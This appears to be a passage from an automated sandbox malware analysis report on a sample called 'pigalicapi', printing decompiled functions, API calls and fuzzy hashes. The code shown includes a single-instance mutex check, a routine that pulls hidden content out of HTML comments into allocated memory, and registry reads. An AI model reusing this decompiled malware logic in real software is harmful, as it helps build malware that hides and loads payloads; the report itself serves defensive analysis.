                                                                                                                                                                                                                                                                                                        											_t53 =  *(_t58 + 0x18);
                                                                                                                                                                                                                                                                                                        											__eflags = _t53;
                                                                                                                                                                                                                                                                                                        											if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        												 *_t65 = _t48;
                                                                                                                                                                                                                                                                                                        												Sleep(??);
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_v52 = _t48;
                                                                                                                                                                                                                                                                                                        												 *_t65 = _t53;
                                                                                                                                                                                                                                                                                                        												WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											E00412210();
                                                                                                                                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                                                                                                                                        											return 0;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}

































                                                                                                                                                                                                                                                                                                        0x00412215
                                                                                                                                                                                                                                                                                                        0x00412218
                                                                                                                                                                                                                                                                                                        0x0041221f
                                                                                                                                                                                                                                                                                                        0x00412221
                                                                                                                                                                                                                                                                                                        0x00412238
                                                                                                                                                                                                                                                                                                        0x0041223e
                                                                                                                                                                                                                                                                                                        0x00412229
                                                                                                                                                                                                                                                                                                        0x00412229
                                                                                                                                                                                                                                                                                                        0x00412230
                                                                                                                                                                                                                                                                                                        0x00412271
                                                                                                                                                                                                                                                                                                        0x00412279
                                                                                                                                                                                                                                                                                                        0x00412281
                                                                                                                                                                                                                                                                                                        0x00412288
                                                                                                                                                                                                                                                                                                        0x0041228d
                                                                                                                                                                                                                                                                                                        0x0041228d
                                                                                                                                                                                                                                                                                                        0x00412236
                                                                                                                                                                                                                                                                                                        0x00412240
                                                                                                                                                                                                                                                                                                        0x00412240
                                                                                                                                                                                                                                                                                                        0x00412243
                                                                                                                                                                                                                                                                                                        0x00412246
                                                                                                                                                                                                                                                                                                        0x0041224b
                                                                                                                                                                                                                                                                                                        0x0041224f
                                                                                                                                                                                                                                                                                                        0x00412251
                                                                                                                                                                                                                                                                                                        0x00412262
                                                                                                                                                                                                                                                                                                        0x00412262
                                                                                                                                                                                                                                                                                                        0x00412270
                                                                                                                                                                                                                                                                                                        0x00412253
                                                                                                                                                                                                                                                                                                        0x00412253
                                                                                                                                                                                                                                                                                                        0x00412256
                                                                                                                                                                                                                                                                                                        0x00412259
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041225b
                                                                                                                                                                                                                                                                                                        0x0041225b
                                                                                                                                                                                                                                                                                                        0x0041225e
                                                                                                                                                                                                                                                                                                        0x00412260
                                                                                                                                                                                                                                                                                                        0x00412297
                                                                                                                                                                                                                                                                                                        0x0041229d
                                                                                                                                                                                                                                                                                                        0x004122a0
                                                                                                                                                                                                                                                                                                        0x004122a3
                                                                                                                                                                                                                                                                                                        0x004122a6
                                                                                                                                                                                                                                                                                                        0x004122a8
                                                                                                                                                                                                                                                                                                        0x004122aa
                                                                                                                                                                                                                                                                                                        0x004122ad
                                                                                                                                                                                                                                                                                                        0x004122b3
                                                                                                                                                                                                                                                                                                        0x004122b3
                                                                                                                                                                                                                                                                                                        0x004122b4
                                                                                                                                                                                                                                                                                                        0x004122b7
                                                                                                                                                                                                                                                                                                        0x004122bc
                                                                                                                                                                                                                                                                                                        0x004122d3
                                                                                                                                                                                                                                                                                                        0x004122d4
                                                                                                                                                                                                                                                                                                        0x004122d5
                                                                                                                                                                                                                                                                                                        0x004122d8
                                                                                                                                                                                                                                                                                                        0x004122db
                                                                                                                                                                                                                                                                                                        0x004122dd
                                                                                                                                                                                                                                                                                                        0x00412357
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004122df
                                                                                                                                                                                                                                                                                                        0x004122df
                                                                                                                                                                                                                                                                                                        0x004122e2
                                                                                                                                                                                                                                                                                                        0x004122e7
                                                                                                                                                                                                                                                                                                        0x004122ea
                                                                                                                                                                                                                                                                                                        0x00412322
                                                                                                                                                                                                                                                                                                        0x00412325
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412327
                                                                                                                                                                                                                                                                                                        0x00412327
                                                                                                                                                                                                                                                                                                        0x00412329
                                                                                                                                                                                                                                                                                                        0x0041232e
                                                                                                                                                                                                                                                                                                        0x00412330
                                                                                                                                                                                                                                                                                                        0x00412332
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412334
                                                                                                                                                                                                                                                                                                        0x00412339
                                                                                                                                                                                                                                                                                                        0x00412340
                                                                                                                                                                                                                                                                                                        0x00412349
                                                                                                                                                                                                                                                                                                        0x00412351
                                                                                                                                                                                                                                                                                                        0x00412356
                                                                                                                                                                                                                                                                                                        0x00412356
                                                                                                                                                                                                                                                                                                        0x00412332
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122ec
                                                                                                                                                                                                                                                                                                        0x004122f1
                                                                                                                                                                                                                                                                                                        0x004122f6
                                                                                                                                                                                                                                                                                                        0x004122f8
                                                                                                                                                                                                                                                                                                        0x004122f8
                                                                                                                                                                                                                                                                                                        0x004122fd
                                                                                                                                                                                                                                                                                                        0x00412300
                                                                                                                                                                                                                                                                                                        0x00412302
                                                                                                                                                                                                                                                                                                        0x00412360
                                                                                                                                                                                                                                                                                                        0x00412363
                                                                                                                                                                                                                                                                                                        0x00412304
                                                                                                                                                                                                                                                                                                        0x00412304
                                                                                                                                                                                                                                                                                                        0x00412308
                                                                                                                                                                                                                                                                                                        0x0041230b
                                                                                                                                                                                                                                                                                                        0x00412311
                                                                                                                                                                                                                                                                                                        0x00412314
                                                                                                                                                                                                                                                                                                        0x0041231c
                                                                                                                                                                                                                                                                                                        0x00412321
                                                                                                                                                                                                                                                                                                        0x00412321
                                                                                                                                                                                                                                                                                                        0x004122ea
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412260
                                                                                                                                                                                                                                                                                                        0x00412259
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412236

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 03044a26b96f7e7b193780177aff1d621ad6876101750b721eb7a4098160cad1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C931E7716042048BDB10BFB996852DFBBA4EF04364F5406AEEC94C7241D7BCD9E0879B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E5E00() {
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                                                        				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                                                                        0x024e5e0c
                                                                                                                                                                                                                                                                                                        0x024e5e25

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,024E3BEB), ref: 024E5E0C
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,024E3BEB), ref: 024E5E12
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                        • String ID: pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5fb5f9302e326ea6b1345604a952967ec721570c79a9d3310e8d8e2abacac4f3
                                                                                                                                                                                                                                                                                                        • Instruction ID: f6d5f293c49776f0ccbb5888676768ef73dda7ff2fc13b04fa5227d37b42dbba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fb5f9302e326ea6b1345604a952967ec721570c79a9d3310e8d8e2abacac4f3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17C08C362C4324ABFA081A61ED8BB497F888760E82F600822F20AC90C1898168908F17
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: mallocmemmoverealloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1823370115-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
                                                                                                                                                                                                                                                                                                        • Instruction ID: e81dcd2bf55d7575d62e3bdedaa82d3939f2d228369639f389b0d43c20e4441b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E11CF0704301EFD724AF15D64071ABBE0AB84744F90C83ED8859B792D7B9988ADB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E8250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v13;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char _t48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                                                                                                                        				char _t63;
                                                                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_v20 = _a4;
                                                                                                                                                                                                                                                                                                        					_v13 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                                                        						_v32 = _t48;
                                                                                                                                                                                                                                                                                                        						_t63 =  *0x24ec700; // 0x0
                                                                                                                                                                                                                                                                                                        						_v28 = _t63;
                                                                                                                                                                                                                                                                                                        						_t51 = E024E7AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                                                        						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v24 = _t51;
                                                                                                                                                                                                                                                                                                        						if(_v24 == 0) {
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                                                        							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                                                        							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                                                        							if(_v36 != 0) {
                                                                                                                                                                                                                                                                                                        								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                                                        								_t58 = E024E8090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                                                        								_v40 = _t58;
                                                                                                                                                                                                                                                                                                        								if(_v40 > 0) {
                                                                                                                                                                                                                                                                                                        									_v13 = 1;
                                                                                                                                                                                                                                                                                                        									_v8 = _v40;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L16:
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x024e8256
                                                                                                                                                                                                                                                                                                        0x024e8261
                                                                                                                                                                                                                                                                                                        0x024e8285
                                                                                                                                                                                                                                                                                                        0x024e828f
                                                                                                                                                                                                                                                                                                        0x024e8292
                                                                                                                                                                                                                                                                                                        0x024e8296
                                                                                                                                                                                                                                                                                                        0x024e82b1
                                                                                                                                                                                                                                                                                                        0x024e82b6
                                                                                                                                                                                                                                                                                                        0x024e82b9
                                                                                                                                                                                                                                                                                                        0x024e82bf
                                                                                                                                                                                                                                                                                                        0x024e82d6
                                                                                                                                                                                                                                                                                                        0x024e82db
                                                                                                                                                                                                                                                                                                        0x024e82de
                                                                                                                                                                                                                                                                                                        0x024e82e5
                                                                                                                                                                                                                                                                                                        0x024e82e7
                                                                                                                                                                                                                                                                                                        0x024e82ed
                                                                                                                                                                                                                                                                                                        0x024e82fb
                                                                                                                                                                                                                                                                                                        0x024e8306
                                                                                                                                                                                                                                                                                                        0x024e830d
                                                                                                                                                                                                                                                                                                        0x024e8318
                                                                                                                                                                                                                                                                                                        0x024e832e
                                                                                                                                                                                                                                                                                                        0x024e8333
                                                                                                                                                                                                                                                                                                        0x024e8336
                                                                                                                                                                                                                                                                                                        0x024e833d
                                                                                                                                                                                                                                                                                                        0x024e833f
                                                                                                                                                                                                                                                                                                        0x024e8346
                                                                                                                                                                                                                                                                                                        0x024e8346
                                                                                                                                                                                                                                                                                                        0x024e834f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e835a
                                                                                                                                                                                                                                                                                                        0x024e830d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e82e5
                                                                                                                                                                                                                                                                                                        0x024e8296
                                                                                                                                                                                                                                                                                                        0x024e835f
                                                                                                                                                                                                                                                                                                        0x024e8365

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000004,-->), ref: 024E8300
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E80D8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                        • String ID: -->$<!--
                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd80511e3003cfd02d885499a89bf7ce7d31a37cbfd14406a5041b5f57d2da5a
                                                                                                                                                                                                                                                                                                        • Instruction ID: c474136921913a2560c0133f6b9c04099c9cabaf4d55cecf75b1d07da768e2fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd80511e3003cfd02d885499a89bf7ce7d31a37cbfd14406a5041b5f57d2da5a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D316B74D00249EFEF04CFA8C584BEEBBB1EB48309F18895AD406B7351D3B59A84CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024EA400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = _a16;
                                                                                                                                                                                                                                                                                                        						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        						if(_t27 == 0) {
                                                                                                                                                                                                                                                                                                        							_v8 = _v20;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x024ea406
                                                                                                                                                                                                                                                                                                        0x024ea411
                                                                                                                                                                                                                                                                                                        0x024ea429
                                                                                                                                                                                                                                                                                                        0x024ea439
                                                                                                                                                                                                                                                                                                        0x024ea43b
                                                                                                                                                                                                                                                                                                        0x024ea43b
                                                                                                                                                                                                                                                                                                        0x024ea442
                                                                                                                                                                                                                                                                                                        0x024ea45c
                                                                                                                                                                                                                                                                                                        0x024ea464
                                                                                                                                                                                                                                                                                                        0x024ea469
                                                                                                                                                                                                                                                                                                        0x024ea480
                                                                                                                                                                                                                                                                                                        0x024ea488
                                                                                                                                                                                                                                                                                                        0x024ea48d
                                                                                                                                                                                                                                                                                                        0x024ea48d
                                                                                                                                                                                                                                                                                                        0x024ea494
                                                                                                                                                                                                                                                                                                        0x024ea494
                                                                                                                                                                                                                                                                                                        0x024ea464
                                                                                                                                                                                                                                                                                                        0x024ea4a0

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 024EA45C
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 024EA480
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 024EA494
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b17d9e64a024c605643990de9111e995a14a1395b49b5e4cea902058a3ab45f6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e3c7a0b77ac4f877b860d5c99c2b50485340fb54251ffde19871c6b2bb1ce1a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b17d9e64a024c605643990de9111e995a14a1395b49b5e4cea902058a3ab45f6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57112874A0021AEBEF15CF94C848BAFB7B4FF44305F00855AE9159B280D7B49A50CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0040EBE0: GetAtomNameA.KERNEL32(?,?,0040DB50), ref: 0040EC03
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 0040EDA2
                                                                                                                                                                                                                                                                                                        • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32 ref: 0040EDB9
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 0040EDFC
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomChangeCloseFindMutexNameNotificationReleasefreememset
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 342251636-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
                                                                                                                                                                                                                                                                                                        • Instruction ID: e0ba675913fac37eea7b8a293b535138c2be36a3a1ced07d229613690e4f81d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
